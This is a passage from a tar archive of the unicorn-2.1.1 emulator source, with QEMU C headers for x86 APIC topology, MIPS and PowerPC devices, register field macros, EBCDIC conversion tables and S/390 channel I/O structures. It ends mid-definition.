apicid_node_offset_epyc(topo_info) + apicid_node_width_epyc(topo_info); } /* * Make APIC ID for the CPU based on Pkg_ID, Core_ID, SMT_ID * * The caller must make sure core_id < nr_cores and smt_id < nr_threads. */ static inline apic_id_t x86_apicid_from_topo_ids_epyc(X86CPUTopoInfo *topo_info, const X86CPUTopoIDs *topo_ids) { return (topo_ids->pkg_id << apicid_pkg_offset_epyc(topo_info)) | (topo_ids->node_id << apicid_node_offset_epyc(topo_info)) | (topo_ids->die_id << apicid_die_offset(topo_info)) | (topo_ids->core_id << apicid_core_offset(topo_info)) | topo_ids->smt_id; } static inline void x86_topo_ids_from_idx_epyc(X86CPUTopoInfo *topo_info, unsigned cpu_index, X86CPUTopoIDs *topo_ids) { unsigned nr_nodes = MAX(topo_info->nodes_per_pkg, 1); unsigned nr_dies = topo_info->dies_per_pkg; unsigned nr_cores = topo_info->cores_per_die; unsigned nr_threads = topo_info->threads_per_core; unsigned cores_per_node = DIV_ROUND_UP((nr_dies * nr_cores * nr_threads), nr_nodes); topo_ids->pkg_id = cpu_index / (nr_dies * nr_cores * nr_threads); topo_ids->node_id = (cpu_index / cores_per_node) % nr_nodes; topo_ids->die_id = cpu_index / (nr_cores * nr_threads) % nr_dies; topo_ids->core_id = cpu_index / nr_threads % nr_cores; topo_ids->smt_id = cpu_index % nr_threads; } /* * Calculate thread/core/package IDs for a specific topology, * based on APIC ID */ static inline void x86_topo_ids_from_apicid_epyc(apic_id_t apicid, X86CPUTopoInfo *topo_info, X86CPUTopoIDs *topo_ids) { topo_ids->smt_id = apicid & ~(0xFFFFFFFFUL << apicid_smt_width(topo_info)); topo_ids->core_id = (apicid >> apicid_core_offset(topo_info)) & ~(0xFFFFFFFFUL << apicid_core_width(topo_info)); topo_ids->die_id = (apicid >> apicid_die_offset(topo_info)) & ~(0xFFFFFFFFUL << apicid_die_width(topo_info)); topo_ids->node_id = (apicid >> apicid_node_offset_epyc(topo_info)) & ~(0xFFFFFFFFUL << apicid_node_width_epyc(topo_info)); topo_ids->pkg_id = apicid >> apicid_pkg_offset_epyc(topo_info); } /* * Make APIC ID for the CPU 'cpu_index' * * 'cpu_index' is a sequential, contiguous ID for the CPU. */ static inline apic_id_t x86_apicid_from_cpu_idx_epyc(X86CPUTopoInfo *topo_info, unsigned cpu_index) { X86CPUTopoIDs topo_ids; x86_topo_ids_from_idx_epyc(topo_info, cpu_index, &topo_ids); return x86_apicid_from_topo_ids_epyc(topo_info, &topo_ids); } /* Make APIC ID for the CPU based on Pkg_ID, Core_ID, SMT_ID * * The caller must make sure core_id < nr_cores and smt_id < nr_threads. */ static inline apic_id_t x86_apicid_from_topo_ids(X86CPUTopoInfo *topo_info, const X86CPUTopoIDs *topo_ids) { return (topo_ids->pkg_id << apicid_pkg_offset(topo_info)) | (topo_ids->die_id << apicid_die_offset(topo_info)) | (topo_ids->core_id << apicid_core_offset(topo_info)) | topo_ids->smt_id; } /* Calculate thread/core/package IDs for a specific topology, * based on (contiguous) CPU index */ static inline void x86_topo_ids_from_idx(X86CPUTopoInfo *topo_info, unsigned cpu_index, X86CPUTopoIDs *topo_ids) { unsigned nr_dies = topo_info->dies_per_pkg; unsigned nr_cores = topo_info->cores_per_die; unsigned nr_threads = topo_info->threads_per_core; topo_ids->pkg_id = cpu_index / (nr_dies * nr_cores * nr_threads); topo_ids->die_id = cpu_index / (nr_cores * nr_threads) % nr_dies; topo_ids->core_id = cpu_index / nr_threads % nr_cores; topo_ids->smt_id = cpu_index % nr_threads; } /* Calculate thread/core/package IDs for a specific topology, * based on APIC ID */ static inline void x86_topo_ids_from_apicid(apic_id_t apicid, X86CPUTopoInfo *topo_info, X86CPUTopoIDs *topo_ids) { topo_ids->smt_id = apicid & ~(0xFFFFFFFFUL << apicid_smt_width(topo_info)); topo_ids->core_id = (apicid >> apicid_core_offset(topo_info)) & ~(0xFFFFFFFFUL << apicid_core_width(topo_info)); topo_ids->die_id = (apicid >> apicid_die_offset(topo_info)) & ~(0xFFFFFFFFUL << apicid_die_width(topo_info)); topo_ids->pkg_id = apicid >> apicid_pkg_offset(topo_info); } /* Make APIC ID for the CPU 'cpu_index' * * 'cpu_index' is a sequential, contiguous ID for the CPU. */ static inline apic_id_t x86_apicid_from_cpu_idx(X86CPUTopoInfo *topo_info, unsigned cpu_index) { X86CPUTopoIDs topo_ids; x86_topo_ids_from_idx(topo_info, cpu_index, &topo_ids); return x86_apicid_from_topo_ids(topo_info, &topo_ids); } #endif /* HW_I386_TOPOLOGY_H */ ���������������������������������������������������������������������������������������unicorn-2.1.1/qemu/include/hw/mips/�����������������������������������������������������������������0000775�0000000�0000000�00000000000�14675241067�0017164�5����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/include/hw/mips/cpudevs.h��������������������������������������������������������0000664�0000000�0000000�00000001033�14675241067�0021003�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������#ifndef HW_MIPS_CPUDEVS_H #define HW_MIPS_CPUDEVS_H #include "target/mips/cpu-qom.h" /* Definitions for MIPS CPU internal devices. */ /* addr.c */ uint64_t cpu_mips_kseg0_to_phys(void *opaque, uint64_t addr); uint64_t cpu_mips_phys_to_kseg0(void *opaque, uint64_t addr); uint64_t cpu_mips_kvm_um_phys_to_kseg0(void *opaque, uint64_t addr); bool mips_um_ksegs_enabled(void); void mips_um_ksegs_enable(void); /* mips_int.c */ void cpu_mips_irq_init_cpu(MIPSCPU *cpu); /* mips_timer.c */ void cpu_mips_clock_init(MIPSCPU *cpu); #endif �����������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/include/hw/ppc/������������������������������������������������������������������0000775�0000000�0000000�00000000000�14675241067�0016776�5����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/include/hw/ppc/ppc.h�������������������������������������������������������������0000664�0000000�0000000�00000010716�14675241067�0017736�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������#ifndef HW_PPC_H #define HW_PPC_H #include "target/ppc/cpu-qom.h" void ppc_set_irq(PowerPCCPU *cpu, int n_IRQ, int level); PowerPCCPU *ppc_get_vcpu_by_pir(int pir); int ppc_cpu_pir(PowerPCCPU *cpu); /* PowerPC hardware exceptions management helpers */ typedef void (*clk_setup_cb)(void *opaque, uint32_t freq); typedef struct clk_setup_t clk_setup_t; struct clk_setup_t { clk_setup_cb cb; void *opaque; }; static inline void clk_setup (clk_setup_t *clk, uint32_t freq) { if (clk->cb != NULL) (*clk->cb)(clk->opaque, freq); } struct ppc_tb_t { /* Time base management */ int64_t tb_offset; /* Compensation */ int64_t atb_offset; /* Compensation */ int64_t vtb_offset; uint32_t tb_freq; /* TB frequency */ /* Decrementer management */ uint64_t decr_next; /* Tick for next decr interrupt */ uint32_t decr_freq; /* decrementer frequency */ QEMUTimer *decr_timer; /* Hypervisor decrementer management */ uint64_t hdecr_next; /* Tick for next hdecr interrupt */ QEMUTimer *hdecr_timer; int64_t purr_offset; void *opaque; uint32_t flags; }; /* PPC Timers flags */ #define PPC_TIMER_BOOKE (1 << 0) /* Enable Booke support */ #define PPC_TIMER_E500 (1 << 1) /* Enable e500 support */ #define PPC_DECR_UNDERFLOW_TRIGGERED (1 << 2) /* Decr interrupt triggered when * the most significant bit * changes from 0 to 1. */ #define PPC_DECR_ZERO_TRIGGERED (1 << 3) /* Decr interrupt triggered when * the decrementer reaches zero. */ #define PPC_DECR_UNDERFLOW_LEVEL (1 << 4) /* Decr interrupt active when * the most significant bit is 1. */ uint64_t cpu_ppc_get_tb(ppc_tb_t *tb_env, uint64_t vmclk, int64_t tb_offset); clk_setup_cb cpu_ppc_tb_init (CPUPPCState *env, uint32_t freq); /* Embedded PowerPC DCR management */ typedef uint32_t (*dcr_read_cb)(void *opaque, int dcrn); typedef void (*dcr_write_cb)(void *opaque, int dcrn, uint32_t val); int ppc_dcr_init (CPUPPCState *env, int (*dcr_read_error)(int dcrn), int (*dcr_write_error)(int dcrn)); int ppc_dcr_register (CPUPPCState *env, int dcrn, void *opaque, dcr_read_cb drc_read, dcr_write_cb dcr_write); clk_setup_cb ppc_40x_timers_init (CPUPPCState *env, uint32_t freq, unsigned int decr_excp); /* Embedded PowerPC reset */ void ppc40x_core_reset(PowerPCCPU *cpu); void ppc40x_chip_reset(PowerPCCPU *cpu); void ppc40x_system_reset(PowerPCCPU *cpu); #if defined(CONFIG_USER_ONLY) static inline void ppc40x_irq_init(PowerPCCPU *cpu) {} static inline void ppc6xx_irq_init(PowerPCCPU *cpu) {} static inline void ppc970_irq_init(PowerPCCPU *cpu) {} static inline void ppcPOWER7_irq_init(PowerPCCPU *cpu) {} static inline void ppcPOWER9_irq_init(PowerPCCPU *cpu) {} static inline void ppce500_irq_init(PowerPCCPU *cpu) {} static inline void ppc_irq_reset(PowerPCCPU *cpu) {} #else void ppc40x_irq_init(PowerPCCPU *cpu); void ppce500_irq_init(PowerPCCPU *cpu); void ppc6xx_irq_init(PowerPCCPU *cpu); void ppc970_irq_init(PowerPCCPU *cpu); void ppcPOWER7_irq_init(PowerPCCPU *cpu); void ppcPOWER9_irq_init(PowerPCCPU *cpu); void ppc_irq_reset(PowerPCCPU *cpu); #endif /* PPC machines for OpenBIOS */ enum { ARCH_PREP = 0, ARCH_MAC99, ARCH_HEATHROW, ARCH_MAC99_U3, }; #define FW_CFG_PPC_WIDTH (FW_CFG_ARCH_LOCAL + 0x00) #define FW_CFG_PPC_HEIGHT (FW_CFG_ARCH_LOCAL + 0x01) #define FW_CFG_PPC_DEPTH (FW_CFG_ARCH_LOCAL + 0x02) #define FW_CFG_PPC_TBFREQ (FW_CFG_ARCH_LOCAL + 0x03) #define FW_CFG_PPC_CLOCKFREQ (FW_CFG_ARCH_LOCAL + 0x04) #define FW_CFG_PPC_IS_KVM (FW_CFG_ARCH_LOCAL + 0x05) #define FW_CFG_PPC_KVM_HC (FW_CFG_ARCH_LOCAL + 0x06) #define FW_CFG_PPC_KVM_PID (FW_CFG_ARCH_LOCAL + 0x07) #define FW_CFG_PPC_NVRAM_ADDR (FW_CFG_ARCH_LOCAL + 0x08) #define FW_CFG_PPC_BUSFREQ (FW_CFG_ARCH_LOCAL + 0x09) #define FW_CFG_PPC_NVRAM_FLAT (FW_CFG_ARCH_LOCAL + 0x0a) #define FW_CFG_PPC_VIACONFIG (FW_CFG_ARCH_LOCAL + 0x0b) #define PPC_SERIAL_MM_BAUDBASE 399193 /* ppc_booke.c */ void ppc_booke_timers_init(PowerPCCPU *cpu, uint32_t freq, uint32_t flags); #endif ��������������������������������������������������unicorn-2.1.1/qemu/include/hw/registerfields.h������������������������������������������������������0000664�0000000�0000000�00000011424�14675241067�0021402�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* * Register Definition API: field macros * * Copyright (c) 2016 Xilinx Inc. * Copyright (c) 2013 Peter Crosthwaite <peter.crosthwaite@xilinx.com> * * This work is licensed under the terms of the GNU GPL, version 2. See * the COPYING file in the top-level directory. */ #ifndef REGISTERFIELDS_H #define REGISTERFIELDS_H #include "qemu/bitops.h" /* Define constants for a 32 bit register */ /* This macro will define A_FOO, for the byte address of a register * as well as R_FOO for the uint32_t[] register number (A_FOO / 4). */ #define REG32(reg, addr) \ enum { A_ ## reg = (addr) }; \ enum { R_ ## reg = (addr) / 4 }; #define REG8(reg, addr) \ enum { A_ ## reg = (addr) }; \ enum { R_ ## reg = (addr) }; #define REG16(reg, addr) \ enum { A_ ## reg = (addr) }; \ enum { R_ ## reg = (addr) / 2 }; /* Define SHIFT, LENGTH and MASK constants for a field within a register */ /* This macro will define R_FOO_BAR_MASK, R_FOO_BAR_SHIFT and R_FOO_BAR_LENGTH * constants for field BAR in register FOO. */ #define FIELD(reg, field, shift, length) \ enum { R_ ## reg ## _ ## field ## _SHIFT = (shift)}; \ enum { R_ ## reg ## _ ## field ## _LENGTH = (length)}; \ enum { R_ ## reg ## _ ## field ## _MASK = \ MAKE_64BIT_MASK(shift, length)}; /* Extract a field from a register */ #define FIELD_EX8(storage, reg, field) \ extract8((storage), R_ ## reg ## _ ## field ## _SHIFT, \ R_ ## reg ## _ ## field ## _LENGTH) #define FIELD_EX16(storage, reg, field) \ extract16((storage), R_ ## reg ## _ ## field ## _SHIFT, \ R_ ## reg ## _ ## field ## _LENGTH) #define FIELD_EX32(storage, reg, field) \ extract32((storage), R_ ## reg ## _ ## field ## _SHIFT, \ R_ ## reg ## _ ## field ## _LENGTH) #define FIELD_EX64(storage, reg, field) \ extract64((storage), R_ ## reg ## _ ## field ## _SHIFT, \ R_ ## reg ## _ ## field ## _LENGTH) /* Extract a field from an array of registers */ #define ARRAY_FIELD_EX32(regs, reg, field) \ FIELD_EX32((regs)[R_ ## reg], reg, field) /* Deposit a register field. * Assigning values larger then the target field will result in * compilation warnings. */ #define FIELD_DP8(storage, reg, field, val, d) { \ struct { \ unsigned int v:R_ ## reg ## _ ## field ## _LENGTH; \ } v = { .v = val }; \ d = deposit32((storage), R_ ## reg ## _ ## field ## _SHIFT, \ R_ ## reg ## _ ## field ## _LENGTH, v.v); \ } #define FIELD_DP16(storage, reg, field, val, d) { \ struct { \ unsigned int v:R_ ## reg ## _ ## field ## _LENGTH; \ } v = { .v = val }; \ d = deposit32((storage), R_ ## reg ## _ ## field ## _SHIFT, \ R_ ## reg ## _ ## field ## _LENGTH, v.v); \ } #define FIELD_DP32(storage, reg, field, val, d) { \ struct { \ unsigned int v:R_ ## reg ## _ ## field ## _LENGTH; \ } v = { .v = val }; \ d = deposit32((storage), R_ ## reg ## _ ## field ## _SHIFT, \ R_ ## reg ## _ ## field ## _LENGTH, v.v); \ } #define FIELD_DP64(storage, reg, field, val, d) { \ struct { \ unsigned int v:R_ ## reg ## _ ## field ## _LENGTH; \ } v = { .v = val }; \ d = deposit64((storage), R_ ## reg ## _ ## field ## _SHIFT, \ R_ ## reg ## _ ## field ## _LENGTH, v.v); \ } /* Deposit a field to array of registers. */ #define ARRAY_FIELD_DP32(regs, reg, field, val) \ (regs)[R_ ## reg] = FIELD_DP32((regs)[R_ ## reg], reg, field, val); #endif ��������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/include/hw/s390x/����������������������������������������������������������������0000775�0000000�0000000�00000000000�14675241067�0017102�5����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/include/hw/s390x/ebcdic.h��������������������������������������������������������0000664�0000000�0000000�00000010026�14675241067�0020463�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* * EBCDIC/ASCII conversion Support * * Copyright (c) 2011 Alexander Graf * Copyright IBM, Corp. 2013 * * This work is licensed under the terms of the GNU GPL, version 2 or (at your * option) any later version. See the COPYING file in the top-level directory. * */ #ifndef EBCDIC_H #define EBCDIC_H /* EBCDIC handling */ static const uint8_t ebcdic2ascii[] = { 0x00, 0x01, 0x02, 0x03, 0x07, 0x09, 0x07, 0x7F, 0x07, 0x07, 0x07, 0x0B, 0x0C, 0x0D, 0x0E, 0x0F, 0x10, 0x11, 0x12, 0x13, 0x07, 0x0A, 0x08, 0x07, 0x18, 0x19, 0x07, 0x07, 0x07, 0x07, 0x07, 0x07, 0x07, 0x07, 0x1C, 0x07, 0x07, 0x0A, 0x17, 0x1B, 0x07, 0x07, 0x07, 0x07, 0x07, 0x05, 0x06, 0x07, 0x07, 0x07, 0x16, 0x07, 0x07, 0x07, 0x07, 0x04, 0x07, 0x07, 0x07, 0x07, 0x14, 0x15, 0x07, 0x1A, 0x20, 0xFF, 0x83, 0x84, 0x85, 0xA0, 0x07, 0x86, 0x87, 0xA4, 0x5B, 0x2E, 0x3C, 0x28, 0x2B, 0x21, 0x26, 0x82, 0x88, 0x89, 0x8A, 0xA1, 0x8C, 0x07, 0x8D, 0xE1, 0x5D, 0x24, 0x2A, 0x29, 0x3B, 0x5E, 0x2D, 0x2F, 0x07, 0x8E, 0x07, 0x07, 0x07, 0x8F, 0x80, 0xA5, 0x07, 0x2C, 0x25, 0x5F, 0x3E, 0x3F, 0x07, 0x90, 0x07, 0x07, 0x07, 0x07, 0x07, 0x07, 0x70, 0x60, 0x3A, 0x23, 0x40, 0x27, 0x3D, 0x22, 0x07, 0x61, 0x62, 0x63, 0x64, 0x65, 0x66, 0x67, 0x68, 0x69, 0xAE, 0xAF, 0x07, 0x07, 0x07, 0xF1, 0xF8, 0x6A, 0x6B, 0x6C, 0x6D, 0x6E, 0x6F, 0x70, 0x71, 0x72, 0xA6, 0xA7, 0x91, 0x07, 0x92, 0x07, 0xE6, 0x7E, 0x73, 0x74, 0x75, 0x76, 0x77, 0x78, 0x79, 0x7A, 0xAD, 0xAB, 0x07, 0x07, 0x07, 0x07, 0x9B, 0x9C, 0x9D, 0xFA, 0x07, 0x07, 0x07, 0xAC, 0xAB, 0x07, 0xAA, 0x7C, 0x07, 0x07, 0x07, 0x07, 0x7B, 0x41, 0x42, 0x43, 0x44, 0x45, 0x46, 0x47, 0x48, 0x49, 0x07, 0x93, 0x94, 0x95, 0xA2, 0x07, 0x7D, 0x4A, 0x4B, 0x4C, 0x4D, 0x4E, 0x4F, 0x50, 0x51, 0x52, 0x07, 0x96, 0x81, 0x97, 0xA3, 0x98, 0x5C, 0xF6, 0x53, 0x54, 0x55, 0x56, 0x57, 0x58, 0x59, 0x5A, 0xFD, 0x07, 0x99, 0x07, 0x07, 0x07, 0x30, 0x31, 0x32, 0x33, 0x34, 0x35, 0x36, 0x37, 0x38, 0x39, 0x07, 0x07, 0x9A, 0x07, 0x07, 0x07, }; static const uint8_t ascii2ebcdic[] = { 0x00, 0x01, 0x02, 0x03, 0x37, 0x2D, 0x2E, 0x2F, 0x16, 0x05, 0x15, 0x0B, 0x0C, 0x0D, 0x0E, 0x0F, 0x10, 0x11, 0x12, 0x13, 0x3C, 0x3D, 0x32, 0x26, 0x18, 0x19, 0x3F, 0x27, 0x22, 0x1D, 0x1E, 0x1F, 0x40, 0x5A, 0x7F, 0x7B, 0x5B, 0x6C, 0x50, 0x7D, 0x4D, 0x5D, 0x5C, 0x4E, 0x6B, 0x60, 0x4B, 0x61, 0xF0, 0xF1, 0xF2, 0xF3, 0xF4, 0xF5, 0xF6, 0xF7, 0xF8, 0xF9, 0x7A, 0x5E, 0x4C, 0x7E, 0x6E, 0x6F, 0x7C, 0xC1, 0xC2, 0xC3, 0xC4, 0xC5, 0xC6, 0xC7, 0xC8, 0xC9, 0xD1, 0xD2, 0xD3, 0xD4, 0xD5, 0xD6, 0xD7, 0xD8, 0xD9, 0xE2, 0xE3, 0xE4, 0xE5, 0xE6, 0xE7, 0xE8, 0xE9, 0xBA, 0xE0, 0xBB, 0xB0, 0x6D, 0x79, 0x81, 0x82, 0x83, 0x84, 0x85, 0x86, 0x87, 0x88, 0x89, 0x91, 0x92, 0x93, 0x94, 0x95, 0x96, 0x97, 0x98, 0x99, 0xA2, 0xA3, 0xA4, 0xA5, 0xA6, 0xA7, 0xA8, 0xA9, 0xC0, 0x4F, 0xD0, 0xA1, 0x07, 0x3F, 0x3F, 0x3F, 0x3F, 0x3F, 0x3F, 0x3F, 0x3F, 0x3F, 0x3F, 0x3F, 0x3F, 0x3F, 0x3F, 0x3F, 0x3F, 0x3F, 0x3F, 0x3F, 0x3F, 0x3F, 0x3F, 0x3F, 0x3F, 0x3F, 0x3F, 0x3F, 0x3F, 0x3F, 0x3F, 0x3F, 0x3F, 0x3F, 0x3F, 0x3F, 0x3F, 0x3F, 0x3F, 0x3F, 0x3F, 0x3F, 0x3F, 0x3F, 0x3F, 0x3F, 0x3F, 0x3F, 0x3F, 0x3F, 0x3F, 0x3F, 0x3F, 0x3F, 0x3F, 0x3F, 0x3F, 0x3F, 0x3F, 0x3F, 0x3F, 0x3F, 0x3F, 0x3F, 0x3F, 0x3F, 0x3F, 0x3F, 0x3F, 0x3F, 0x3F, 0x3F, 0x3F, 0x3F, 0x3F, 0x3F, 0x3F, 0x3F, 0x3F, 0x3F, 0x3F, 0x3F, 0x3F, 0x3F, 0x3F, 0x3F, 0x3F, 0x3F, 0x3F, 0x3F, 0x3F, 0x3F, 0x3F, 0x3F, 0x3F, 0x3F, 0x3F, 0x3F, 0x59, 0x3F, 0x3F, 0x3F, 0x3F, 0x3F, 0x3F, 0x3F, 0x3F, 0x3F, 0x3F, 0x3F, 0x3F, 0x3F, 0x3F, 0x3F, 0x3F, 0x3F, 0x3F, 0x3F, 0x3F, 0x3F, 0x3F, 0x90, 0x3F, 0x3F, 0x3F, 0x3F, 0xEA, 0x3F, 0xFF }; static inline void ebcdic_put(uint8_t *p, const char *ascii, int len) { int i; for (i = 0; i < len; i++) { p[i] = ascii2ebcdic[(uint8_t)ascii[i]]; } } static inline void ascii_put(uint8_t *p, const char *ebcdic, int len) { int i; for (i = 0; i < len; i++) { p[i] = ebcdic2ascii[(uint8_t)ebcdic[i]]; } } #endif /* EBCDIC_H */ ����������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/include/hw/s390x/ioinst.h��������������������������������������������������������0000664�0000000�0000000�00000016054�14675241067�0020566�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* * S/390 channel I/O instructions * * Copyright 2012 IBM Corp. * Author(s): Cornelia Huck <cornelia.huck@de.ibm.com> * * This work is licensed under the terms of the GNU GPL, version 2 or (at * your option) any later version. See the COPYING file in the top-level * directory. */ #ifndef S390X_IOINST_H #define S390X_IOINST_H /* * Channel I/O related definitions, as defined in the Principles * Of Operation (and taken from the Linux implementation). */ /* subchannel status word (command mode only) */ typedef struct SCSW { uint16_t flags; uint16_t ctrl; uint32_t cpa; uint8_t dstat; uint8_t cstat; uint16_t count; } SCSW; QEMU_BUILD_BUG_MSG(sizeof(SCSW) != 12, "size of SCSW is wrong"); #define SCSW_FLAGS_MASK_KEY 0xf000 #define SCSW_FLAGS_MASK_SCTL 0x0800 #define SCSW_FLAGS_MASK_ESWF 0x0400 #define SCSW_FLAGS_MASK_CC 0x0300 #define SCSW_FLAGS_MASK_FMT 0x0080 #define SCSW_FLAGS_MASK_PFCH 0x0040 #define SCSW_FLAGS_MASK_ISIC 0x0020 #define SCSW_FLAGS_MASK_ALCC 0x0010 #define SCSW_FLAGS_MASK_SSI 0x0008 #define SCSW_FLAGS_MASK_ZCC 0x0004 #define SCSW_FLAGS_MASK_ECTL 0x0002 #define SCSW_FLAGS_MASK_PNO 0x0001 #define SCSW_CTRL_MASK_FCTL 0x7000 #define SCSW_CTRL_MASK_ACTL 0x0fe0 #define SCSW_CTRL_MASK_STCTL 0x001f #define SCSW_FCTL_CLEAR_FUNC 0x1000 #define SCSW_FCTL_HALT_FUNC 0x2000 #define SCSW_FCTL_START_FUNC 0x4000 #define SCSW_ACTL_SUSP 0x0020 #define SCSW_ACTL_DEVICE_ACTIVE 0x0040 #define SCSW_ACTL_SUBCH_ACTIVE 0x0080 #define SCSW_ACTL_CLEAR_PEND 0x0100 #define SCSW_ACTL_HALT_PEND 0x0200 #define SCSW_ACTL_START_PEND 0x0400 #define SCSW_ACTL_RESUME_PEND 0x0800 #define SCSW_STCTL_STATUS_PEND 0x0001 #define SCSW_STCTL_SECONDARY 0x0002 #define SCSW_STCTL_PRIMARY 0x0004 #define SCSW_STCTL_INTERMEDIATE 0x0008 #define SCSW_STCTL_ALERT 0x0010 #define SCSW_DSTAT_ATTENTION 0x80 #define SCSW_DSTAT_STAT_MOD 0x40 #define SCSW_DSTAT_CU_END 0x20 #define SCSW_DSTAT_BUSY 0x10 #define SCSW_DSTAT_CHANNEL_END 0x08 #define SCSW_DSTAT_DEVICE_END 0x04 #define SCSW_DSTAT_UNIT_CHECK 0x02 #define SCSW_DSTAT_UNIT_EXCEP 0x01 #define SCSW_CSTAT_PCI 0x80 #define SCSW_CSTAT_INCORR_LEN 0x40 #define SCSW_CSTAT_PROG_CHECK 0x20 #define SCSW_CSTAT_PROT_CHECK 0x10 #define SCSW_CSTAT_DATA_CHECK 0x08 #define SCSW_CSTAT_CHN_CTRL_CHK 0x04 #define SCSW_CSTAT_INTF_CTRL_CHK 0x02 #define SCSW_CSTAT_CHAIN_CHECK 0x01 /* path management control word */ typedef struct PMCW { uint32_t intparm; uint16_t flags; uint16_t devno; uint8_t lpm; uint8_t pnom; uint8_t lpum; uint8_t pim; uint16_t mbi; uint8_t pom; uint8_t pam; uint8_t chpid[8]; uint32_t chars; } PMCW; QEMU_BUILD_BUG_MSG(sizeof(PMCW) != 28, "size of PMCW is wrong"); #define PMCW_FLAGS_MASK_QF 0x8000 #define PMCW_FLAGS_MASK_W 0x4000 #define PMCW_FLAGS_MASK_ISC 0x3800 #define PMCW_FLAGS_MASK_ENA 0x0080 #define PMCW_FLAGS_MASK_LM 0x0060 #define PMCW_FLAGS_MASK_MME 0x0018 #define PMCW_FLAGS_MASK_MP 0x0004 #define PMCW_FLAGS_MASK_TF 0x0002 #define PMCW_FLAGS_MASK_DNV 0x0001 #define PMCW_FLAGS_MASK_INVALID 0x0700 #define PMCW_CHARS_MASK_ST 0x00e00000 #define PMCW_CHARS_MASK_MBFC 0x00000004 #define PMCW_CHARS_MASK_XMWME 0x00000002 #define PMCW_CHARS_MASK_CSENSE 0x00000001 #define PMCW_CHARS_MASK_INVALID 0xff1ffff8 /* subchannel information block */ QEMU_PACK(typedef struct SCHIB { PMCW pmcw; SCSW scsw; uint64_t mba; uint8_t mda[4]; }) SCHIB; /* interruption response block */ typedef struct IRB { SCSW scsw; uint32_t esw[5]; uint32_t ecw[8]; uint32_t emw[8]; } IRB; QEMU_BUILD_BUG_MSG(sizeof(IRB) != 96, "size of IRB is wrong"); /* operation request block */ typedef struct ORB { uint32_t intparm; uint16_t ctrl0; uint8_t lpm; uint8_t ctrl1; uint32_t cpa; } ORB; QEMU_BUILD_BUG_MSG(sizeof(ORB) != 12, "size of ORB is wrong"); #define ORB_CTRL0_MASK_KEY 0xf000 #define ORB_CTRL0_MASK_SPND 0x0800 #define ORB_CTRL0_MASK_STR 0x0400 #define ORB_CTRL0_MASK_MOD 0x0200 #define ORB_CTRL0_MASK_SYNC 0x0100 #define ORB_CTRL0_MASK_FMT 0x0080 #define ORB_CTRL0_MASK_PFCH 0x0040 #define ORB_CTRL0_MASK_ISIC 0x0020 #define ORB_CTRL0_MASK_ALCC 0x0010 #define ORB_CTRL0_MASK_SSIC 0x0008 #define ORB_CTRL0_MASK_C64 0x0002 #define ORB_CTRL0_MASK_I2K 0x0001 #define ORB_CTRL0_MASK_INVALID 0x0004 #define ORB_CTRL1_MASK_ILS 0x80 #define ORB_CTRL1_MASK_MIDAW 0x40 #define ORB_CTRL1_MASK_ORBX 0x01 #define ORB_CTRL1_MASK_INVALID 0x3e /* channel command word (type 0) */ typedef struct CCW0 { uint8_t cmd_code; uint8_t cda0; uint16_t cda1; uint8_t flags; uint8_t reserved; uint16_t count; } CCW0; QEMU_BUILD_BUG_MSG(sizeof(CCW0) != 8, "size of CCW0 is wrong"); /* channel command word (type 1) */ typedef struct CCW1 { uint8_t cmd_code; uint8_t flags; uint16_t count; uint32_t cda; } CCW1; QEMU_BUILD_BUG_MSG(sizeof(CCW1) != 8, "size of CCW1 is wrong"); #define CCW_FLAG_DC 0x80 #define CCW_FLAG_CC 0x40 #define CCW_FLAG_SLI 0x20 #define CCW_FLAG_SKIP 0x10 #define CCW_FLAG_PCI 0x08 #define CCW_FLAG_IDA 0x04 #define CCW_FLAG_SUSPEND 0x02 #define CCW_FLAG_MIDA 0x01 #define CCW_CMD_NOOP 0x03 #define CCW_CMD_BASIC_SENSE 0x04 #define CCW_CMD_TIC 0x08 #define CCW_CMD_SENSE_ID 0xe4 typedef struct CRW { uint16_t flags; uint16_t rsid; } CRW; QEMU_BUILD_BUG_MSG(sizeof(CRW) != 4, "size of CRW is wrong"); #define CRW_FLAGS_MASK_S 0x4000 #define CRW_FLAGS_MASK_R 0x2000 #define CRW_FLAGS_MASK_C 0x1000 #define CRW_FLAGS_MASK_RSC 0x0f00 #define CRW_FLAGS_MASK_A 0x0080 #define CRW_FLAGS_MASK_ERC 0x003f #define CRW_ERC_EVENT 0x00 /* event information pending */ #define CRW_ERC_AVAIL 0x01 /* available */ #define CRW_ERC_INIT 0x02 /* initialized */ #define CRW_ERC_TERROR 0x03 /* temporary error */ #define CRW_ERC_IPI 0x04 /* installed parm initialized */ #define CRW_ERC_TERM 0x05 /* terminal */ #define CRW_ERC_PERRN 0x06 /* perm. error, facility not init */ #define CRW_ERC_PERRI 0x07 /* perm. error, facility init */ #define CRW_ERC_PMOD 0x08 /* installed parameters modified */ #define CRW_ERC_IPR 0x0A /* installed parameters restored */ #define CRW_RSC_SUBCH 0x3 #define CRW_RSC_CHP 0x4 #define CRW_RSC_CSS 0xb /* I/O interruption code */ QEMU_PACK(typedef struct IOIntCode { uint32_t subsys_id; uint32_t 